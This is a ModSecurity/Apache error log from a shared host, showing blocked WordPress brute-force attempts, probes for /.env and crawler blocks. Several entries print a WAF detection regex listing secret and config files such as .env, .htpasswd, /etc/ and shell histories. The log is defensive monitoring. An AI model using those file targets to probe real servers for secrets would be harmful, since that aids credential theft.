[Tue May 26 19:00:01.076823 2026] [security2:error] [pid 1045635:tid 1045804] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgWBhDcQXYr7SS5sUNCwAAACc"]
[Tue May 26 19:00:03.222412 2026] [security2:error] [pid 1045635:tid 1045830] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgWhhDcQXYr7SS5sUNQwAAAEE"]
[Tue May 26 19:00:05.101664 2026] [security2:error] [pid 1045635:tid 1045752] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgXRhDcQXYr7SS5sUNeQAAKHQ"]
[Tue May 26 19:00:05.101861 2026] [security2:error] [pid 1045635:tid 1045805] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgXRhDcQXYr7SS5sUNeQAAKHQ"]
[Tue May 26 19:00:05.383049 2026] [security2:error] [pid 1045635:tid 1045853] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgXBhDcQXYr7SS5sUNcgAAAFg"]
[Tue May 26 19:00:05.457332 2026] [security2:error] [pid 1045635:tid 1045884] [client 14.242.206.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgXRhDcQXYr7SS5sUNdQAAAHc"]
[Tue May 26 19:00:07.939961 2026] [security2:error] [pid 1045635:tid 1045822] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgXxhDcQXYr7SS5sUNwQAAADk"]
[Tue May 26 19:00:10.096361 2026] [security2:error] [pid 1045635:tid 1045848] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgYRhDcQXYr7SS5sUN-QAAAFM"]
[Tue May 26 19:00:10.873513 2026] [security2:error] [pid 1045635:tid 1045673] [remote 222.165.190.235:44712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgYhhDcQXYr7SS5sUOFQAAJiU"]
[Tue May 26 19:00:11.069678 2026] [security2:error] [pid 1045635:tid 1045819] [client 176.65.139.229:52070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kexcouriers.onesoft.in"] [uri "/.env"] [unique_id "ahWgYxhDcQXYr7SS5sUOGQAAADY"]
[Tue May 26 19:00:11.479727 2026] [security2:error] [pid 1045635:tid 1045654] [remote 222.165.190.235:44712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.190.165.222.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWgYxhDcQXYr7SS5sUOIAAAGRI"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:00:12.388436 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgYxhDcQXYr7SS5sUOMQAAAG0"]
[Tue May 26 19:00:12.738027 2026] [security2:error] [pid 1045635:tid 1045834] [client 176.65.139.233:48244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kineticinfraprojects.com.onesoft.in"] [uri "/.env"] [unique_id "ahWgZBhDcQXYr7SS5sUOSAAAAEU"]
[Tue May 26 19:00:15.204598 2026] [security2:error] [pid 1045635:tid 1045801] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgZhhDcQXYr7SS5sUOfwAAACQ"]
[Tue May 26 19:00:15.853599 2026] [security2:error] [pid 1045635:tid 1045646] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgZxhDcQXYr7SS5sUOlgAAVwo"]
[Tue May 26 19:00:15.853785 2026] [security2:error] [pid 1045635:tid 1045852] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgZxhDcQXYr7SS5sUOlgAAVwo"]
[Tue May 26 19:00:16.346414 2026] [security2:error] [pid 1045635:tid 1045812] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgZxhDcQXYr7SS5sUOngAAAC8"]
[Tue May 26 19:00:16.456461 2026] [security2:error] [pid 1045635:tid 1045685] [remote 171.235.163.210:56848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWgaBhDcQXYr7SS5sUOpgAAZjE"]
[Tue May 26 19:00:17.659669 2026] [security2:error] [pid 1045635:tid 1045677] [remote 31.24.44.107:45360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgaRhDcQXYr7SS5sUOxwAAZyk"]
[Tue May 26 19:00:17.950259 2026] [security2:error] [pid 1045635:tid 1045710] [remote 31.24.44.107:45360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgaRhDcQXYr7SS5sUOzAAAT0o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:00:18.746712 2026] [security2:error] [pid 1045635:tid 1045832] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgahhDcQXYr7SS5sUO2AAAAEM"]
[Tue May 26 19:00:19.280727 2026] [security2:error] [pid 1045635:tid 1045704] [remote 69.49.112.72:5084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.112.49.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahWgahhDcQXYr7SS5sUO4gAAFEQ"]
[Tue May 26 19:00:21.276828 2026] [security2:error] [pid 1045635:tid 1045807] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgbBhDcQXYr7SS5sUPFAAAACo"]
[Tue May 26 19:00:21.347496 2026] [security2:error] [pid 1045635:tid 1045712] [remote 103.95.119.103:54350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgbRhDcQXYr7SS5sUPGwAAQ0w"]
[Tue May 26 19:00:24.020576 2026] [security2:error] [pid 1045635:tid 1045782] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgbxhDcQXYr7SS5sUPWwAAABE"]
[Tue May 26 19:00:24.216532 2026] [security2:error] [pid 1045635:tid 1045816] [client 85.208.96.196:18020] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWgcBhDcQXYr7SS5sUPbAAAADM"]
[Tue May 26 19:00:24.216735 2026] [security2:error] [pid 1045635:tid 1045816] [client 85.208.96.196:18020] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/11/"] [unique_id "ahWgcBhDcQXYr7SS5sUPbAAAADM"]
[Tue May 26 19:00:26.303894 2026] [security2:error] [pid 1045635:tid 1045770] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgcRhDcQXYr7SS5sUPmQAAAAU"]
[Tue May 26 19:00:26.924052 2026] [security2:error] [pid 1045635:tid 1045709] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgchhDcQXYr7SS5sUPpgAAbEk"]
[Tue May 26 19:00:26.924232 2026] [security2:error] [pid 1045635:tid 1045873] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgchhDcQXYr7SS5sUPpgAAbEk"]
[Tue May 26 19:00:28.707876 2026] [security2:error] [pid 1045635:tid 1045871] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgdBhDcQXYr7SS5sUP1gAAAGo"]
[Tue May 26 19:00:29.603252 2026] [security2:error] [pid 1045635:tid 1045724] [remote 113.190.40.93:50810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgdRhDcQXYr7SS5sUP8gAAV1g"]
[Tue May 26 19:00:30.173531 2026] [security2:error] [pid 1045635:tid 1045891] [client 14.169.196.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgdRhDcQXYr7SS5sUQAQAAAH4"]
[Tue May 26 19:00:30.892811 2026] [security2:error] [pid 1045635:tid 1045828] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgdhhDcQXYr7SS5sUQEAAAAD8"]
[Tue May 26 19:00:33.276753 2026] [security2:error] [pid 1045635:tid 1045866] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgeBhDcQXYr7SS5sUQVgAAAGU"]
[Tue May 26 19:00:34.933880 2026] [autoindex:error] [pid 1045635:tid 1045770] [client 43.165.7.74:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://gldmarsa.com
[Tue May 26 19:00:35.511592 2026] [security2:error] [pid 1045635:tid 1045787] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgexhDcQXYr7SS5sUQigAAABY"]
[Tue May 26 19:00:37.249966 2026] [security2:error] [pid 1045635:tid 1045747] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgfRhDcQXYr7SS5sUQuQAAOG8"]
[Tue May 26 19:00:37.250136 2026] [security2:error] [pid 1045635:tid 1045821] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgfRhDcQXYr7SS5sUQuQAAOG8"]
[Tue May 26 19:00:37.662489 2026] [security2:error] [pid 1045635:tid 1045871] [client 172.225.77.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWgfRhDcQXYr7SS5sUQvgAAAGo"]
[Tue May 26 19:00:37.744122 2026] [security2:error] [pid 1045635:tid 1045851] [client 74.7.228.38:54376] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.thegoodsporting.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWgfRhDcQXYr7SS5sUQxwAAVnQ"]
[Tue May 26 19:00:37.848239 2026] [security2:error] [pid 1045635:tid 1045806] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgfRhDcQXYr7SS5sUQvwAAACk"]
[Tue May 26 19:00:39.887306 2026] [security2:error] [pid 1045635:tid 1045815] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgfxhDcQXYr7SS5sUQ9QAAADI"]
[Tue May 26 19:00:42.109906 2026] [security2:error] [pid 1045635:tid 1045656] [remote 47.128.99.73:16228] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/tag/news/"] [unique_id "ahWgghhDcQXYr7SS5sURNwAAFhQ"]
[Tue May 26 19:00:42.448400 2026] [security2:error] [pid 1045635:tid 1045797] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgghhDcQXYr7SS5sURNQAAACA"]
[Tue May 26 19:00:44.691327 2026] [security2:error] [pid 1045635:tid 1045837] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWghBhDcQXYr7SS5sURbwAAAEg"]
[Tue May 26 19:00:44.871539 2026] [security2:error] [pid 1045635:tid 1045848] [client 198.244.240.219:62846] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWghBhDcQXYr7SS5sURdgAAAFM"]
[Tue May 26 19:00:44.871668 2026] [security2:error] [pid 1045635:tid 1045848] [client 198.244.240.219:62846] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWghBhDcQXYr7SS5sURdgAAAFM"]
[Tue May 26 19:00:46.235747 2026] [security2:error] [pid 1045635:tid 1045799] [client 15.235.96.115:20272] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "acdealernoida.in"] [uri "/"] [unique_id "ahWghhhDcQXYr7SS5sURoQAAACI"]
[Tue May 26 19:00:46.235887 2026] [security2:error] [pid 1045635:tid 1045799] [client 15.235.96.115:20272] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "acdealernoida.in"] [uri "/"] [unique_id "ahWghhhDcQXYr7SS5sURoQAAACI"]
[Tue May 26 19:00:46.990209 2026] [security2:error] [pid 1045635:tid 1045772] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWghhhDcQXYr7SS5sURqQAAAAc"]
[Tue May 26 19:00:47.898337 2026] [security2:error] [pid 1045635:tid 1045672] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWghxhDcQXYr7SS5sURwwAASyQ"]
[Tue May 26 19:00:47.898545 2026] [security2:error] [pid 1045635:tid 1045840] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWghxhDcQXYr7SS5sURwwAASyQ"]
[Tue May 26 19:00:49.200900 2026] [security2:error] [pid 1045635:tid 1045823] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgiBhDcQXYr7SS5sUR1gAAADo"]
[Tue May 26 19:00:51.549712 2026] [security2:error] [pid 1045635:tid 1045888] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgixhDcQXYr7SS5sUSDgAAAHs"]
[Tue May 26 19:00:53.888967 2026] [security2:error] [pid 1045635:tid 1045869] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgjRhDcQXYr7SS5sUSYwAAAGg"]
[Tue May 26 19:00:54.198589 2026] [security2:error] [pid 1045635:tid 1045811] [client 49.13.164.148:30156] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWgjRhDcQXYr7SS5sUSaQAAAC4"], referer: http://ucdc.co.in/
[Tue May 26 19:00:54.902271 2026] [security2:error] [pid 1045635:tid 1045788] [client 113.162.20.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgjhhDcQXYr7SS5sUSeAAAABc"]
[Tue May 26 19:00:56.542990 2026] [security2:error] [pid 1045635:tid 1045789] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgkBhDcQXYr7SS5sUSqQAAABg"]
[Tue May 26 19:00:57.456721 2026] [security2:error] [pid 1045635:tid 1045715] [remote 154.26.132.116:60090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.132.26.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWgkRhDcQXYr7SS5sUSxAAAfE8"]
[Tue May 26 19:00:57.827250 2026] [core:crit] [pid 1045635:tid 1045851] (13)Permission denied: [client 40.77.167.126:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 19:00:58.478584 2026] [security2:error] [pid 1045635:tid 1045842] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgkhhDcQXYr7SS5sUS3gAAAE0"]
[Tue May 26 19:00:58.669572 2026] [security2:error] [pid 1045635:tid 1045725] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgkhhDcQXYr7SS5sUS5gAAS1k"]
